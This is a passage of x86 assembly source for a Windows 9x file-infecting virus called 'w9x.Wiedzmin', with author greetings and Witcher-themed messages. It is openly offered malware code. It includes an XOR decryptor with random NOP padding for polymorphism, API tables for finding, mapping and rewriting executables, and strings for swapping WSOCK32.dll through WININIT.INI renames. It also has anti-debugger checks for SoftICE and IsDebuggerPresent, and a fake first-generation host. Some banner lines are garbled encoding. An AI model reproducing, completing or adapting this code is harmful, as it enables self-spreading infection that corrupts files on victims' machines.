db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
|
||
db "<w9x.Wiedzmin (c) - YuP - Welcome to new school>",0ah,0dh
|
||
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
|
||
db "Æ Deithwen Addan Flared Again",0ah,0dh
|
||
db "Æ You have eyez, but u can't see",0ah,0dh
|
||
db "Æ You have earz, but u can't hear",0ah,0dh
|
||
db "Æ Wake up from unreal world before",0ah,0dh
|
||
db "Æ you drown in the Sea of Chaos.",0ah,0dh
|
||
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
|
||
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
|
||
db 0ah,0dh,0
|
||
wsock db "\WSOCK32.dll",0
|
||
nowe db "\WZZOCK32.dll",0
|
||
sice9x db "\\.\SICE",0
|
||
sle db "WSASetLastError",0
|
||
user32 db "USER32.DLL",0
|
||
gdi32 db "GDI32.DLL",0
|
||
WININIT db "WININIT.INI",0
|
||
rename db "rename",0
|
||
jed db "X",0
|
||
famil db "Verdana",0
|
||
logo db ": w9x.WiEDZMiN has you :",0
|
||
deshit db "kfe",0,07h
|
||
|
||
|
||
|
||
|
||
|
||
@crypt_my_body:
|
||
push ecx
|
||
call dword ptr [ebp+_GetTickCount]
|
||
mov ebx,255
|
||
idiv ebx
|
||
mov ecx,edx
|
||
|
||
@mutualisk:
|
||
mov byte ptr [edi],90h
|
||
inc edi
|
||
loop @mutualisk
|
||
pop ecx
|
||
|
||
pushad
|
||
lea edx,[ebp+offset @to_this]
|
||
mov eax,[ebp+key_main]
|
||
mov ecx,TO_DE
|
||
|
||
@loop_decryptt:
|
||
xor byte ptr [edx],al
|
||
inc edx
|
||
loop @loop_decryptt
|
||
@end_de:
|
||
popad
|
||
rep movsb
|
||
mov edi,'!PUY'
|
||
call @main_decryptor
|
||
ret
|
||
|
||
|
||
|
||
key_main dd 0
|
||
|
||
;db 5 dup (90h)
|
||
|
||
|
||
; align dword
|
||
VirusEnd label byte
|
||
|
||
;==================================================FIND=========================================
|
||
;=============================================VirtualData nie idzie do wira=====================
|
||
|
||
HeapStart label byte
|
||
finddata WIN32_FIND_DATA <> ;wskaznik do struktury
|
||
fileHandle dd 0
|
||
fileAtrib dd 0
|
||
|
||
|
||
licznik_b dd 0
|
||
|
||
|
||
APIListA: _FindFirstFileA dd 0
|
||
_FindNextFileA dd 0
|
||
_FindClose dd 0
|
||
_SetAttributesA dd 0
|
||
_SetFileTime dd 0
|
||
_CreateFileA dd 0
|
||
_CreateFileMappingA dd 0
|
||
_MapViewOfFile dd 0
|
||
_UnmapViewOfFile dd 0
|
||
_GetFileTime dd 0
|
||
_GetFileSize dd 0
|
||
_GetFileAttributesA dd 0
|
||
_SetFileAttributesA dd 0
|
||
_ReadFile dd 0
|
||
_WriteFile dd 0
|
||
_SetFilePointer dd 0
|
||
_SetEndOfFile dd 0
|
||
_CloseHandle dd 0
|
||
_SetCurrentDirectoryA dd 0
|
||
_GetWindowsDirectoryA dd 0
|
||
_GetSystemDirectoryA dd 0
|
||
_CopyFileA dd 0
|
||
_ExitProcess dd 0
|
||
_GetTickCount dd 0
|
||
_GetCommandLineA dd 0
|
||
_IsDebuggerPresent dd 0
|
||
_OutputDebugStringA dd 0
|
||
_WinExec dd 0
|
||
_LoadLibraryA dd 0
|
||
_GetModuleHandleA dd 0
|
||
_Sleep dd 0
|
||
_GetSystemTime dd 0
|
||
_WritePrivateProfileStringA dd 0
|
||
_VirtualAlloc dd 0
|
||
_VirtualFree dd 0
|
||
_GetCurrentDirectoryA dd 0
|
||
|
||
|
||
@GDI_APIZA: _CreateFontA dd 0
|
||
_TextOutA dd 0
|
||
_SetBkMode dd 0
|
||
_SetTextColor dd 0
|
||
_SelectObject dd 0
|
||
_GetSystemMetrics dd 0
|
||
_GetDesktopWindow dd 0
|
||
_GetWindowDC dd 0
|
||
_ReleaseDC dd 0
|
||
|
||
|
||
SYSTEM_TIME: wYear dw 0
|
||
wMonth dw 0
|
||
wDayOfWeek dw 0
|
||
wDay dw 0
|
||
wHour dw 0
|
||
wMinute dw 0
|
||
wSecond dw 0
|
||
wMilliseconds dw 0
|
||
|
||
|
||
|
||
F1: dd 2 dup (?)
|
||
F2: dd 2 dup (?)
|
||
F3: dd 2 dup (?)
|
||
|
||
vbuf dd 0
|
||
help_virus dd 0
|
||
memory dd 0
|
||
header dd 0
|
||
align dd 0
|
||
_hostIP dd 0
|
||
_secAlign dd 0
|
||
newEIP dd 0
|
||
NewEIP dd 0
|
||
firstk dd 0
|
||
key2 dd 0
|
||
|
||
go_wsock dd 0
|
||
wsock_h dd 0
|
||
moj_address dd 0
|
||
capis dd 0
|
||
wsock_hh dd 0
|
||
|
||
NON dd 0 ;numbers of names
|
||
AOF dd 0 ;addr of Functions
|
||
AON dd 0 ;addr of Names
|
||
AOO dd 0 ;addr of Ordinals
|
||
|
||
IndexA dd 0
|
||
_GPA dd 0
|
||
|
||
fHnd dd 0
|
||
fHndMap dd 0
|
||
fMapReal dd 0
|
||
fSize dd 0
|
||
|
||
my_seh dd 0
|
||
|
||
was_win dd 0
|
||
ic dd 0
|
||
sHnd dd 0
|
||
shitsize dd 0
|
||
|
||
|
||
oldDIR db 512 dup (?)
|
||
winDIR db 260 dup (?)
|
||
sysDIR db 260 dup (?)
|
||
winDIRr db 260 dup (?)
|
||
db 5 dup (?)
|
||
|
||
|
||
|
||
|
||
toHOST dd 0
|
||
|
||
|
||
; align dword
|
||
HeapEnd label byte
|
||
|
||
|
||
|
||
titlee db "w9x.Wiedzmin by YuP - 1st Generation",0
|
||
bodyy db "Elaine blath, Feainnewedd",0ah,0dh
|
||
db "Dearme aen a'caelme tedd",0ah,0dh
|
||
db "Eigean evelienn deireadh",0ah,0dh
|
||
db "Que'n esse, va en esseath",0ah,0dh
|
||
db "Feainnewedd, elaine blath!"
|
||
db 0ah,0dh
|
||
virussizee
|
||
db " bytes",0
|
||
|
||
fakehost:
|
||
push 0h
|
||
push offset titlee
|
||
push offset bodyy
|
||
push 0h
|
||
call MessageBoxA
|
||
|
||
|
||
push 0h
|
||
call ExitProcess
|
||
|
||
|
||
endshit: ends
|
||
|
||
|
||
End v_start
|